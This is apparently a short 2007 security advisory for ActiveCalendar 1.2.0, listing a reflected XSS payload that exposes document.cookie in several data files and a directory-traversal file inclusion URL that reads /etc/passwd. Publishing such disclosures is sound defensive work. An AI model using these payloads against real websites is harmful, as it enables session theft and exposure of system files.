Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16180
HistoryFeb 25, 2007 - 12:00 a.m.

ActiveCalendar 1.2.0, Multiple vulnerabilities

2007-02-2500:00:00
vulners.com
14

ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/
Global risk : Critical

Multiples XSS :

/activecalendar/data/[page].php?css="><script>alert(document.cookie)</script>

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php

Local File Include :

/activecalendar/data/showcode.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd%00

Regards,

Simon Bonnard - 24/02/07 - 02:40am